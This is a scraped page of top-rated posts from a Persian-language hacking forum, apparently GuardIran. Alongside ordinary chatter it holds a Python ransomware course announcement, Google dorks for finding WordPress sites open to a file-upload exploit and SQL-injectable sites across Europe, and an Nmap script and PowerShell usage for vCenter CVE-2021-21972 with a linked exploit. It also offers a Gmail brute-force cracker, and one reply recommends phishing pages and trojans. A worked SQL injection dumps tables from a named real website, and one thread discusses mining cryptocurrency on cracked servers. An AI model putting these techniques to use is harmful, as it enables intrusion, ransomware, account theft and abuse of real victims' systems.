discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. RT3N

    RT3N

    مدیر تیم


    • امتیاز

      30

    • تعداد ارسال ها

      536


  2. SHADOW-hacker007

    SHADOW-hacker007

    کاربر تازه وارد


    • امتیاز

      29

    • تعداد ارسال ها

      62


  3. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      17

    • تعداد ارسال ها

      2,564


  4. Zed

    Zed

    کاربر تازه وارد


    • امتیاز

      11

    • تعداد ارسال ها

      106



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در دوشنبه, 18 اسفند 1399 در همه بخش ها

  1. 7 امتیاز
    با سلام خدمت کاربران انجمن تیم گاردایران ضمن خسته نباشید به برادر عزیزم, ارتقای ایشون رو به مدیریت ارشد تیم تبریک میگم امیدوارم با این ارتقا بخش کوچکی از زحماتشون جبران شده باشه/ بعنوان عضوی از انجمن گاردایران بابت فعالیت مثبت شما از سال 94 تا به امروز کمال تشکر رو دارم. موفق و سربلند باشید . پست موقت/
  2. 7 امتیاز
    با سلام این باگ در بخش نظرات امکان آپلود فایل را فراهم میکند Vuln Verion : 7.0.0 - 7.0.4 Dork : inurl:"/wp-content/plugins/wpdiscuz/" index of "/wp-content/plugins/wpdiscuz/" چون سایتهای وردپرسی اکثرا مسیر wp-content رو disallow کردن پس ممکنه با این دورک نتونید تارگت زیادی پیدا کنید برای همین از دورک زیر استفاده کنید و بعد چک کنید ببینید این پلاگین رو داره یا خیر site:.com/robots.txt intext:"Disallow: /wp-content/" بعد از آپلود فایل ، فایل در مسیر زیر قرار میگیره /wp-content/uploads/2021/03/ /wp-content/uploads/ماه/سال/ نمونه تارگت https://singxsing.com/lyrics/39/%e4%b8%96%e4%b8%8a%e5%8f%aa%e6%9c%89 اکسپلویت https://www.exploit-db.com/exploits/49401 موفق باشید
  3. 7 امتیاز
    سلام امروز یک کار خیلی کوچولو کردم و یکم بازی پکمن رو انگولک کردم برای نصبش شما نیاز دارید به یک شبیه ساز کونسول اتاری با نصب استلا این نیاز رفع میشه sudo apt install stella وقتی اجراش کنید نیاز دارید به فایل بازی که در زیر ضمیمه شده و بعد در اکسپلور نرم افزار فایل بازی رو انتخاب کنید و اینتر رو بزنید جون شما هیچ وقت کم نمیشه اگر میخواید خود اصلی رو بازی کنید از این لینک استفاده کنید شاید نیاز باشه پراکس ی استفاده کنید Pac-Man (1982) (Atari).a26
  4. 6 امتیاز
    سلام، وقت بخیر. برای اینکه پیام ها برای شما پاک نشوند میتونید از نسخه های غیر رسمی واتساپ مثل GBWhatsapp, FMWhatsapp, YoWhatsapp, ... استفاده کنید ولی با استفاده از این نسخه ها امنیت شما پایین میاد و پیشنهاد میکنم حتی المکان از نسخه اصلی واتساپ استفاده کنید.
  5. 6 امتیاز
    سلام دوست عزیز لطفا سوالتون رو دقیقتر بیان کنید. پیام های پاک شده از طرف شما یا از طرف فرستنده؟ من سوالتون رو درست متوجه نشدم ولی این رو امتحان کنید شاید به کارتون بیاد. یا حق🌹
  6. 5 امتیاز
    با سلام بنده به @proxy عزیز تبریک میگم و واقعا لیاقتشو داشت. همچنین تشکر میکنم بابت زحماتت و ایشالا همیشه توی همه زمینه ها موفق باشی.❤️ شیرینی یادت نره داداش 😉
  7. 4 امتیاز
    به نام خدا عرض سلام و خسته نباشید خدمت همگی دوستان و کاربران محترم. با عنایت خدا قراره که یه دوره باج افزار نویسی برای سیستم عامل ویندوز رو با زبان شیرین پایتون رو شروع کنیم. عزیزانی که می خوان تو این دوره با من همراه باشند باید به زبان پایتون تسلط کافی داشته باشند. راستش رو بخواید من 2 تا دوره رو تو نت رفتم دیدم بفهمم آموزش هایی که تو اینترنت هست در چه سطحی هستند، به قدری باج افزار ها ضعیف طراحی شده بود که ویدیو ها رو تا آخرشم ندیدم، عینا فایل هایی که همراه یکی از دوره ها بود رو گزاشتم تا یه هارد یه ترا رو انکریپت کنه، زمان وحشتناک طولانی و کلیدی که راحت شکسته میشد و ... ،واقعا طراحی ضعیفی داشت و اصلا بهش رسیدگی نشده بود. حالا اومدیم تا با هم یه دوره خوب رو شروع کنیم و یه باج افزار عالی بنویسیم تا بتونه آموزش های ناکارآمد رو کنار بزنه و بهترین بشه. دوستان دیگه هم اگر در این زمینه مهارتی دارند شخصی پیام دهند تا با هم تاپیک رو جلو ببریم. دوره به دو بخش تقسیم میشه! 1- طراحی اسکلت باج افزار یعنی میایم یه باج افزار می نویسیم که فقط یه لیستی از پسوند ها رو انکریپت کنه، و کلید رو برای ما بفرسته، به همراه یه فایل دیکرپتور ساده. 2- ارتقا باج افزار نوشته شده کم کم میایم این باج افزار خام رو ارتقا میدیم و اون رو به یه غول همه فن حریف تبدیل می کنیم!! پیشنیاز ها: 1- یه کامپیوتر یا لپتاب که فقط سیستم عامل داشته باشه! 2- تسلط کامل بر روی زبان برنامه نویسی پایتون 3- آشنایی جزئی با ویندوز(ریجستری و موارد دیگه، نه چیزای گرافیکی...) 4- یک ویندوز مجازی موارد نصبی 1- پایتون3 (در دوره از پایتون 3.9 استفاده می شود) 2- ادیتور (بنده از VScode استفاده میکنم) اگر با ریجستری ویندوز آشنایی داشته باشید، کارتون در قسمت دوم دوره خیلی راحت میشه. در قسمت اول، از کتابخونه Cryptography استفاده میشه، اما اگر خدا بخواد رمزنگاری پیچیده تری رو تو قسمت دوم پیاده سازی می کنیم. قوانین تاپیک 1- هیچ احدی، از ادمین گرفته تا کاربر تازه وارد، بدون هماهنگی داخل تاپیک پست نگذارید. 2- سوالات در این تاپیک پرسیده نمی شوند. برای پرسش سوال کلیک کنید. 3- باتوجه به بعضی دلایل شاید پست ها خیلی زود به زود ارسال نشه، پس خواهشا در این زمینه شکایتی نکنید! 4- در صورت داشتن سوال شخصی، انتقاد یا کمک در این زمینه کلیک کنید و پیام شخصی ارسال کنید. 5- مهم ترین قانون، «تارگت ایرانی ممنوعه» ما ایرانی هستیم و به خودمون صدمه ای وارد نمی کنیم. پیشاپیش از اینکه به قوانین احترام میگذارید از همگی متشکرم. از ادمین عزیز هم که تاپیک رو ستاره دار کردند خیلی ممنونم. این جلسه: معرفی دوره + یک نمونه عملی: Guardiran.mp4 دوره در تمامی جلسات در ویندوز 10 مجازی برگزار میشه. عزیزانی که مایل به دنبال کردن این موضوع هستند، حتما قبل از شروع دوره یک ویندوز مجازی آماده کنند. ویندوز چندش مهم نیست، ولی بهتره 8 یا 10 باشه. رفع مسئولیت تمام مسئولیت های استفاده از باج افزار بر عهده خود فرد میباشد و اینجانب هیچ گونه مسئولیتی در قبال استفاده نادرست از این بدافزار را ندارم و هرگونه پاسخگویی به ادعاهای مطرح شده توسط اشخاص حقیقی و حقوقی با منتشرکننده(بنده) است و تیم امنیتی گاردایران هیچگونه مسئولیتی نسبت به آن ندارد. این پست در صورت لزوم آپدیت خواهد شد. موفق باشید🌹
  8. 4 امتیاز
    بسم الله الرحمن الرحیم دورک ساده از تمام کشور های اروپا امیدوارم کیف کنید. 1-آلبانی= site:*.al inurl:index.php?id=1 2-آلمان= > site:*.eu inurl:index.php?id=1 site:*.de inurl:index.php?id=1 3-آندورا= > site:*.ad inurl:index.php?id=1 4-اتریش= > site:*.at inurl:index.php?id=1 5-ارمنستان= > site:*.am inurl:index.php?id=1 > site:*.հայ inurl:index.php?id=1 6-اسپانیا= > site:*.es inurl:index.php?id=1 7-استونی= > site:*.ee inurl:index.php?id=1 8-اسکاتلند= > site:*.sk inurl:index.php?id=1 9-اسلواکی= > site:*.si inurl:index.php?id=1 10-اسلوونی= > site:*.si inurl:index.php?id=1 11-اوکراین= > site:*.ua inurl:index.php?id=1 12-ایتالیا= > site:*.it inurl:index.php?id=1 13-ایسلند= > site:*.is inurl:index.php?id=1 14-بریتانیا= > site:*.uk inurl:index.php?id=1 15-بلاروس= > site:*.by inurl:index.php?id=1 16-بلژیک= > site:*.be inurl:index.php?id=1 17-بلغارستان= > site:*.bg inurl:index.php?id=1 18-بوسنی= > site:*.ba inurl:index.php?id=1 guardiran.org 20-هرزگوین= > site:*.ba inurl:index.php?id=1 21-پرتغال= > site:*.pt inurl:index.php?id=1 22-ترکیه= > site:*.tr inurl:index.php?id=1 23-آذربایجان= > site:*.az inurl:index.php?id=1 24-ایرلند= > site:*.ie inurl:index.php?id=1 25-چک= > site:*.cz inurl:index.php?id=1 27-دانمارک= > site:*.dk inurl:index.php?id=1 28-روسیه= > site:*.ru inurl:index.php?id=1 29-رومانی= > site:*.ro inurl:index.php?id=1 30-سان مارینو= > site:*.sm inurl:index.php?id=1 31-سوئد= > site:*.se inurl:index.php?id=1 32-سوئیس= > site:*.ch inurl:index.php?id=1 33-صبرستان= > site:*.rs inurl:index.php?id=1 site:*.yu inurl:index.php?id=1 34-فنلاند= > site:*.fi inurl:index.php?id=1 35-فرانسه= > site:*.fr inurl:index.php?id=1 36-قبرس= > site:*.cy inurl:index.php?id=1 37-قزاقزستان= > site:*.kz inurl:index.php?id=1 39-کرواسی= > site:*.hr inurl:index.php?id=1 40-گرجستان= > site:*.ge inurl:index.php?id=1 41-لتونی= > site:*.lv inurl:index.php?id=1 42-لوکزامبورگ= > site:*.lu inurl:index.php?id=1 43-لهستان= > site:*.pl inurl:index.php?id=1 44-لیتوانی= > site:*.lt inurl:index.php?id=1 45-مالت= > site:*.mt inurl:index.php?id=1 46-مجارستان= > site:*.hu inurl:index.php?id=1 47-مولداوی= > site:*.MD inurl:index.php?id=1 48-موناکو= > site:*.mc inurl:index.php?id=1 49-نروژ= > site:*.no inurl:index.php?id=1 50-واتیکان= > site:*.va inurl:index.php?id=1 51-هلند= > site:*.nl inurl:index.php?id=1 52-یونان= > site:*.gr inurl:index.php?id=1 ----------------------- guardiran.org --سربلند و پیروز باشید--
  9. 4 امتیاز
    آخرین نسخه Nessus به همراه نحوه فعال سازی + پلاگین های آپدیت شده مشخصات : پلاگین ورژن : 202103030317 تاریخ آپدیت : March 3 2021 1399/12/13 https://s16.picofile.com/file/8427280626/all_2_0_202103030317_tar.gz.html پسورد: guardiran.org وارد سایت رسمی Nessus بشید و نسخه 18.13.1 رو دریافت کنید : https://www.tenable.com/downloads/nessus?loginAttempted=true بعد از نصب فایل نصبی دستورات زیر رو به ترتیب وارد کنید ما فرض رو بر این گرفتیم کاربر ویندوز هستید : 1 : Open CMD ( Run As Administrator ) 2: Stop Nessus Service - ( net stop "Tenable Nessus" ) 3: تغییر دسترسی فایل ها: attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugins\*.*" attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugin_feed_info.inc" "C:\Program Files\Tenable\Nessus\nessuscli.exe" update "C:\Users\RTEN\Desktop\all-2.0_202103030317.tar.gz" تا اینجای کار خسته نباشید و وقتی در CMD این پیام رو دریافت کردید یعنی پلاگین هارو بصورت آفلاین نصب کردید روی Nessus : [info] Copying templates version 202102012215 to C:\ProgramData\Tenable\Nessus\nessus\templates\tmp [info] Finished copying templates. [info] Moved new templates with version 202102012215 from plugins dir. * Update successful. The changes will be automatically processed by Nessus. 4 : کپی فایل مشخصات پلاگین نصب شده : copy "C:\ProgramData\Tenable\Nessus\nessus\plugins\plugin_feed_info.inc" "C:\ProgramData\Tenable\Nessus\nessus\" 5: تغییر دسترسی ها : attrib +s +r +h "C:\ProgramData\Tenable\Nessus\nessus\plugins\*.*" attrib +s +r +h "C:\ProgramData\Tenable\Nessus\nessus\plugin_feed_info.inc" attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugins\plugin_feed_info.inc" با دستور زیر سرویس Nessus رو فعال کنید : net start "Tenable Nessus" وارد صفحه Nessus بشید و لذت ببرید : https://localhost:8834/#/ اضافه میکنم که باید Managed Scan رو انتخاب کنید مثل نسخه قبلی که در پست قبلی توضیحات ارایه دادم و بعد از اون Tenable.sc رو انتخاب کنید بعد از اون user /pass انتخاب کنید و وارد بشید: عزیزانی که سیستم عامل لینوکسی دارند معادل سازی کنند مراحل رو اگر بلد نباشید قبل از اینکه وارد عرصه امنیت اطلاعات بشید باید اول دسترورات لینوکسی و کار با این سیستم عامل رو اول دوره کنید خشت اول رو کج بزارید تا اخرشو اشتباه میرید و وسط کار زده میشید . ( 4 تا دستور ساده chmod و کپی این داستانا نداره ) شاعر میفرماید : خشت اول چون نهد معمار کج تا ثریا می رود دیوار کج!! Nessus اسکنر پیشنهادی من هستش من چندین ساله ازش استفاده میکنم اسکنر های زیادی رو برسی و استفاده کردم اما Nessus بهترین اسکنری هست که میتونید داشته باشید . موفق باشید./
  10. 2 امتیاز
    بسم الله الرحمن الرحیم ابزار جدید برای پیدا کردن صفحه ادمین این برنامه بی نقص هست و 2 هفته هست که ساخته شده انشالله بهتون کمکی کرده باشم git clone https://github.com/proponentHacker/FalconViewer cd FalconViewer pip3 install -r requestments.txt python3 FalconViewer.py سربلند و پیروز باشید
  11. 2 امتیاز
    سلام اگه منظورتون اینه که فرستنده اومده یه چیزی رو براتون فرستاده و بعد اومده پاک کرده، راهی برای بازگشتش نیست! حتی اگر بکاپ هم گرفته باشید، بعد از بازیابی داده ها اگر واتساپ متوجه شود فرستنده پیامی را حذف کرده به اون امان نمیده و خیلی سریع حذفش می کنه. تنها یک راه می مونه، اونم اینکه اگر از قبل بکاپ داشتید، اون رو باز کنید و به سراغ دیتابیس برید، اونجا اگر تونستید اون رو دیکریپت کنید، می توانید پیام ها رو مشاهده کنید. یا اینکه به نحوی به اطلاعات فایل بکاپ دسترسی داشته باشید. غیر از این راه، هیچ راه دیگه ای نیست؛ نه نرم افزار، و نه ابزاری. چون چیزی که اثری ازش نمونده رو نمیشه بر گردوند. موفق باشید🌷
  12. 2 امتیاز
    اسکریپت Nmap جهت برسی آسیب پذیری CVE-2021-21972: description = [[ VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability This script looks the existence of CVE-2021-21972 based on the following PATH "/ui/vropspluginui/rest/services/uploadova" trough a POST request and looking in response body (500) the words "uploadFile",that means the vCenter is avaiable to accept files via POST without any restrictions Manual inspection: # curl -i -s -k -X $'GET' -H $'Host: <target>' -H $'User-Agent: alex666' $'https://<target>/ui/vropspluginui/rest/services/getstatus' # curl -i -s -k -X $'GET' -H $'Host: <target>' -H $'User-Agent: alex666'$'https://<target>/ui/vropspluginui/rest/services/uploadova' # curl -i -s -k -X $'POST' -H $'Host: <target>' -H $'User-Agent: alex666' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' $'https://<target>/ui/vropspluginui/rest/services/uploadova' References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972' https://www.vmware.com/security/advisories/VMSA-2021-0002.html ]] --- -- @usage -- nmap -p443 --script CVE-2021-21972.nse <target> -- @output -- PORT STATE SERVICE -- 443/tcp open https -- | CVE-2021-21972: -- | VULNERABLE: -- | vCenter 6.5-7.0 RCE -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2021-21972 -- | The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. -- | A malicious actor with network access to port 443 may exploit this issue to execute commands with -- | unrestricted privileges on the underlying operating system that hosts vCenter Server. -- | Disclosure date: 2021-02-23 -- | References: -- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972 author = "Alex Hernandez aka alt3kx <alt3kx@protonmail.com>" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"vuln", "exploit"} local shortport = require "shortport" local http = require "http" local stdnse = require "stdnse" local string = require "string" local vulns = require "vulns" portrule = shortport.http action = function(host, port) local vuln = { title = "vCenter 6.5-7.0 RCE", state = vulns.STATE.NOT_VULN, IDS = { CVE = 'CVE-2021-21972' }, description = [[ The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.]], references = { 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972' }, dates = { disclosure = {year = '2021', month = '02', day = '23'}, }, } local report = vulns.Report:new(SCRIPT_NAME, host, port) local uri = "/ui/vropspluginui/rest/services/uploadova" local options = {header={}} options['header']['User-Agent'] = "Mozilla/5.0 (compatible; vCenter)" local response = http.post(host, port, uri) if ( response.status == 500 ) then local title = string.match(response.body, "uploadFile") if (title == "uploadFile") then vuln.state = vulns.STATE.EXPLOIT else vuln.state = vulns.STATE.NOT_VULN end end return report:make_output (vuln) end CVE-2021-21972.nse اگر از ابزار nmap استفاده نمیکنید و کاربر windows هستید از اسکریپت زیر استفاده کنید : Invoke-CVE-2021-21972-Scan.ps1 نحوه استفاده : Basic usage: C:\PS> PowerShell.exe -ExecutionPolicy Bypass .\Invoke-CVE-2021-21972-Scan.ps1 -targetHosts "vcenter.local","vcenter.net" All options with force scan: C:\PS> PowerShell.exe -ExecutionPolicy Bypass .\Invoke-CVE-2021-21972-Scan.ps1 -targetHosts "vcenter.local","vcenter.net" -outputFile "output.txt" -force All options with force scan (shorthand version): C:\PS> PowerShell.exe -ExecutionPolicy Bypass .\Invoke-CVE-2021-21972-Scan.ps1 -t "vcenter.local","vcenter.net" -o "output.txt" -f و در نهایت اکسپلویت : بنده اکسپلویت رو تغییراتی دادم تا کارایی بیشتری داشته باشه اما نسخه بدونه تغییر اکسپلویت رو قرار میدم تا استفاده کنید" CVE-2021-21972-main.zip موفق و سربلند باشید.
  13. 1 امتیاز
    SRX

    ماین مونرو با vps

    سلام اگه می خواهید مونرو استخراج کنید به یه سرور خوب نیاز دارید. وقتی میگم خوب منظورم 4 هسته ای نیست! اگه می خواهید این کار را بکنید از نظر بنده که قبلا تجربش رو داشتم، حداقل یه سیستم 8 هسته ای می خواهید. 8 هسته ای کمترین چیزیه می می تونید تهیه کنید. و بهترین گزینه سرور های رده بالا 32 هسته ای و .. هستن!!! که البته خیلی کم پیش میاد موقع کرک چشمتون به یه سرور اینطور بیفته و برای خریدش هم باید هزینه زیادی کنید. در کل بخوام بگم اگه بخواهید با سرور های 2 یا 4 هسته ای ماین کنید به جایی نمی رسید، مگه اینکه تعداد سرور ها بالا باشه. اصلا اینطور نیست، حالا نمی دونم تا حالا سرور کرک کردید یا نه، اما اگر تا حالا این کار را کرده باشید می بینید که بیشترشان 2 هسته،4 هسته یا 8 هسته اند، حداقل برای من اغلب 4 هسته میوفته😐 این کار رو هم می تونید بکنید ولی باید به صرفه؛ الان اگر کسی پسورد لیست های خوبی داشته باشه که پر از مستر پسورده باشه، به کسی نمیده؛ از پسورد های پابلیک هم بِنُدرت چیزی در میاد؛ پس راهی نمی مونه مگر اینکه بسم الله رو بگید و خودتون شروع کنید به نوشتن پسوردلیست. اگر بتونید این کار رو هم بکنید هم بد نیست. من که تو ماین کردن به جایی نرسیدم😑 شما رو نمی دونم، با توجه به چیزایی که گفتم خودتون می تونید تصمیم بگیرید. حالا دوستان هم اگر نظری دارند بگویند. و در مورد اون «الو😥» هم باید بگم اسپم نکنید. اگر کسی چیزی بدونه حتما راهنماییتون می کنه. لزومی نداره الکی تاپیک رو بیارید بالا. موفق و پیروز باشید🌹🌺
  14. 1 امتیاز
    همین اسیب پذیری ها که عکسشو گذاشتم هر کدوم که جدی تره و چیز بیشتری میشه ازش درآورد رو بگو مرسی (سایت درباره فروش اکانت های اینستاگرامیه)
  15. 1 امتیاز
    این استتوس میگه تمام بازه ای که براش تعریف کردی تست شده و بی فایده بوده قبل از هر چیزی در وحله ی اول نوع md5 رو میدونی ؟ یا درست تعریف کردی ؟ خود هش md5 انواع مختلفی داره
  16. 1 امتیاز
    M4hd1

    GMail CrackEr

    همونطور که میدونید گوگل اخیرا کاری کرده که اگر شما گزینه Allow Less Secure Apps رو از داخل تنظیمات جیمیلتون فعال نکرده باشید دیگه نمی تونید از طریق برنامه های دیگه که Certificate ندارن به جیمیلتون وصل شید. به همین دلیل هم هست که برنامه هایی مثل Hydra , Sanmao و غیره روی جیمیل کار نمی کنن. اما این برنامه از یک مرورگر برای لاگین کردن استفاده می کنه که گوگل تصور می کنه یک کاربر عادی و نه یک اپلیکیشن داره لاگین می کنه پس بهش گیر نمیده و عملیات کرک رو می تونید اغاز کنیم. نکته ای که وجود داره اینه که پروکسی هایی که به برنامه میدید باید دارای SSL باشند در غیر این صورت عملیات کرک با مشکل مواجه میشه. در کنار کرکر یک ابزار کوچیک هم گذاشتم که براتون پروکسی های SSL دار رو گرب می کنه اما ممکنه که همشون alive نباشن بنابراین نیاز هست که چکشون کنید. برای افزایش دقت کرک نکات زیر رو رعایت کنید : پروکسی با سرعت بالا و دارای SSL تعداد ترید ها به سرعت نت و پروکسیتون بستگی داره بنابراین تعداد معقولی رو استفاده کنید. لینک دانلود کرکر: http://0app.me/blog/downloads/GMailCrackerBeta1.zip لینک دانلود پروکسی گربر: http://0app.me/blog/downloads/SSLProxy.zip ویدیو اموزشی : http://0app.me/blog/downloads/CrackingGmailTutorial.rar لینک اسکن : https://virustotal.com/en/file/06ca10f95bf1da317381af98a3562da45288d7ec1dbc35f2a7cc952f1428a583/analysis/ https://virustotal.com/en/file/7cc1154e3b95048344cc8fed16f1e6e404acaab8a8ee0cfb8fab43761004ba4e/analysis/1470947774/
  17. 1 امتیاز
    _Faz_

    GMail CrackEr

    کرک کردن ایمیل یک کار بیهوده هستش . ممکن هستش برای به دست اوردن پسورد یه ایمیل شما دهها سال تلاش کنید ولی به نتیجه نرسید ! فیک پیج ها و تروجانها همیشه در اولویت هستن و فقط کافیه توانایی ااینو داشته باشید تا قربانی را به این صفحات هدایت کنید
  18. 1 امتیاز
    ویرایشگر متن بسیار عالی 😉 دانلود
  19. 1 امتیاز
    تست کردم مشکل داشت اما برای اینکه شما هم بتونین از برنامه استفاده کنید میتونید ابزار رو در محیط امن اجرا کنید مثل ماشین مجازی یا سندباکس
  20. 1 امتیاز
    بعد نصب این پیام رو میده Starting XAMPP for Linux 1.8.1... XAMPP: Starting Apache with SSL (and PHP5)... XAMPP: Starting MySQL... XAMPP: Starting ProFTPD... XAMPP: h4cker_black_hat_ssl proftpd[2377]: warning: unable to determine IP address of 'h4cker_black_hat_ssl' h4cker_black_hat_ssl proftpd[2377]: error: no valid servers configured h4cker_black_hat_ssl proftpd[2377]: Fatal: error processing configuration file '/opt/lampp/etc/proftpd.conf' XAMPP: Error 1! Couln't start ProFTPD! XAMPP for Linux started.
  21. 1 امتیاز
    آموزش xxe,ssrf نبود؟
  22. 1 امتیاز
    عیدی : 0 ریال :I
  23. 1 امتیاز
    پوست سیب رفته لای دندونم ;((((
  24. 1 امتیاز
    دنبال لینک دانلود متاسپلویت با فرمت run میگردم(بع غیر از سایتش)
  25. 1 امتیاز
    با سلام خدمت دوست عزیز. میخواستم بدونم که با اوبونتو 13.10 میشه یه ویندوز رو هک کرد؟؟؟
  26. 1 امتیاز
    با سلام. وقتی میخوام چیزی دانلود کنم اصلا هیچی از مشخصات دانلود رو تو idm نشون نمیده و دانلود هم نمیشه.
  27. 1 امتیاز
    دوست عزیز سایت های مثل SOFT98.IR میتونید سرچ کنید کرک بیت دفندر موجود هست هجمش زیاد وگرنه برات پیوست میکردم
  28. 1 امتیاز
  29. 1 امتیاز
    سلام به کاربران گرامی چند وقتی است که کاربر رد رکوردر فعالیت ندارند و این تاپیک هم دیگه کار نمیکنه چون ایشون نیستند ولی اگر کسی میتونه این تاپیک رو اداره کنه یاحق ولی لطفا تا زمانی که کسی اعلام امادگی نکرده است دیگه درخواست ندید چون پاسخی دریافت نمی کنید... موفق و سربلند باشید
  30. 1 امتیاز
    شاید رد کودر عزیز سرشون شلوغ باشه پس با اجازه من ج میدم بهترین برنامه که معلومه فتوشاپ هست و فک نکنم رقیبی تو قدرت داشته باشه+ اموزشهای گرافیک تو نت زیاد هست اگه سرچ کنی و حوصله و صبر داشته باشی خیلی زود طراحی و گرافیک یاد می گیری.
  31. 1 امتیاز
    سلام ببخشید دوستان میخواستم بپرسم کسی میتونه به من بگه توی جاوا اسکریپت چطوری پسوردی که کاربر تایپ میکنه رو به صورت * نشون بدم ؟
  32. 1 امتیاز
    دوست عزیز کار کردم و اشنایی دارم خیلی ممنون میشم اموزش بزارید
  33. 1 امتیاز
    سلام خدمت تمامی عزیزان گارد ایران. جای این تاپیک در انجمن خالی بود. در این تاپیک دوستانی که در زمینه کرکینگ فعالیت و تخصص دارند رکرد های کرک خودشون رو قرار بدن. قوانین تاپیک: 1-اسپم ممنوع 2-از درخواست کتنفیگ و... جدا خودداری کنید. 3-از کپی کردن رکورد ها از سایت های دیگر جدا خودداری کنید. دوستانی که در زمینه کرکینگ تخصص دارند میتونن تخصصشون رو در این تاپیک با رکورد هاشون اثبات کنند. موفق باشید یا حق
  34. 1 امتیاز
  35. 1 امتیاز
  36. 1 امتیاز
  37. 1 امتیاز
    imantekyeh

    کار با هایدر

    مرسی از راهنماییتون ی سوال با چه نرم افزاری انجام میده
  38. 1 امتیاز
    ابتدا از پاسخ های کاربر انجمن abarestan تشکر میکنم. دوستان عزیز لطفا سوال و جواب هارو یکخورده سریحتر بدین تا تاپیک سوال طولانی نشه. دوست عزیز که سوال داشتین،موبایل هیچوقت سطح دسترسی کامپیوتر رو نمیده و شما زیاد نمیتونین با گوشی رو هدفتون مانور بدین. شما در هاستی که ساختین،فایل رو آپلود میکنید(که نحوه آپلود رو دوست عزیزم abarestan زحمتش رو کشیدن) و لینک رو به قربانی میدین؟الان شما کدوم یک از این کارهارو نمیتونید با گوشی انجام بدین؟ اگر مشکل شما آپلوده،باید بگم من با گوشی امتحان کردم و فرقی نداره. اگر مشکل شما لینکه،باید بگم در بالای هر مرورگر در گوشی تلفن همراه کادری هست که لینک به نمایش در میاد،لینک رو کپی کرده و به قربانی میدین. یا حق
  39. 1 امتیاز
    اگه اینجوریه که خوبه... ولی من کلا هیچکاری نمیتونم با گوشی انجام بدم!
  40. 1 امتیاز
    قربونت یعنی با موبایل فایل و اپلود کنی؟! یا اینکه تارگت با موبایل بیاد اینجا؟! اگر منظورت اینکه تارگت با موبایل بیاد بله باز هم جواب میده. اگر منظورت اپلود با موبایل باز هم میشه
  41. 1 امتیاز
    شما که لینک رو به طرف بدین فایلهایی که در داخل هاست آپلود کردین فایلی با پسوند .txt موجوده که تمامی یوزر و پسوردهای وارد شده به این فایل منتقل میشوند. دوست عزیز همونطور که icelord عزیز گفتم سؤالتتون رو در بخش سؤالات مطرح کنین.
  42. 1 امتیاز
    NET.HUN73R

    تارگت تمرینی

    http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables-- CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,background,blog_commentmeta,blog_comments,blog_links,blog_options,blog_postmeta,blog_posts,blog_term_relationships,blog_term_taxonomy,blog_terms,blog_usermeta,blog_users,boxes,card_cards,card_collections,card_sub_collections,card_to_collection,card_topright,cards,collections,json_cache,slides,sub_collections,tweet_mentions,tweet_tags,tweet_urls,tweets,users http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(column_name),5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273-- user_id,screen_name,name,profile_image_url,location,url,description,created_at,followers_count,friends_count,statuses_count,time_zone,last_update http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(user_id),5,6,7,8+from+users--
  43. 1 امتیاز
    به توکل نام اعظمت با سلام خدمت شما دوستان عزیز ... این تاپیک رو با نام خدا و عنوان اموزش کرک کردن انواع هش آغاز کردم و امیدوارم مفید واقع بشه و بتونید استفاده لازم را ببرید.. سعی بر این شده مطالبی که در این تاپیک ارسال میشوند با زبان بسیار ساده و قابل فهم برای تمام کاربران با تمام سطوح باشند دوستان سوالات خودتون رو در بخش سوال و جواب های ابزار های امنیتی مطرح کنید مباحثی که در این تاپیک قرار داده میشود : هش چیست hash - Password Hash,.. انواع هش hash - Salt Hash ,... تشخیص انواع الگوریتم های هش از همدیگر Hash Algoritm - MD5 Hash - SH1 Hash ,... فیلم های آموزشی کار با پر کاربرد ترن نرم افزارهای کرک در این زمینه کرک انواع هش قوانین تاپیک : از دوستان خواهشمندم که اسپم نکنید پسورد تمام فایل های ضمیمه شده : guardiran.org
  44. 1 امتیاز
    پیوست شد پسورد: guardiran.org موفق باشید htaccess generator.rar
  45. 1 امتیاز
    هش Hash چیست؟ ( Password Hash ) هش را میتوان اثر انگشت دیجیتالی یک داده نام برد هش نوعی الگوریتم یک طرفه است که با استفاده از فرمول های ریاضی یک متن با طول ثابت رشته ای (fixed length) و با طول کوتاه تولید میکند کشف رشته اصلی از رشته هش آن کاملا غیر ممکن است یا میتوان گفت عملیات معکوس کردن هش کاری غیر ممکن است و هیچگاه عملی نمیشود یعنی هیچگاه نمیتوان از متن یک هش به متن واقعی رسید احتمال یکی شدن داده دو رشته هش متفاوت امکان بذیر نیست و هر داده یک رشته هش مختص به خود و منحصر به فرد دارد و هرگز دو ورودی متفاوت به یک خروجی یکسان منجر نمیشود طبق توضیحات بالا فهمیدیم که الگوریتم های هش معکوس پذیر نیستند و منحصر به فرد هستند یعنی هرگز دو ورودی متفاوت به یک خروجی یکسان منجر نمیشود اگر یکی از این دو خصوصیت نقض شود میگیوییم که الگوریتم شکسته شده.. میتوان کاربردهای زیادی از هش را نام برد که من بخشی کوتاهی از آنها را در توضیح میدهم: در فضای سایبری محافطت ار گذرواژها و انواع پسوردها یکی از دغدغه های 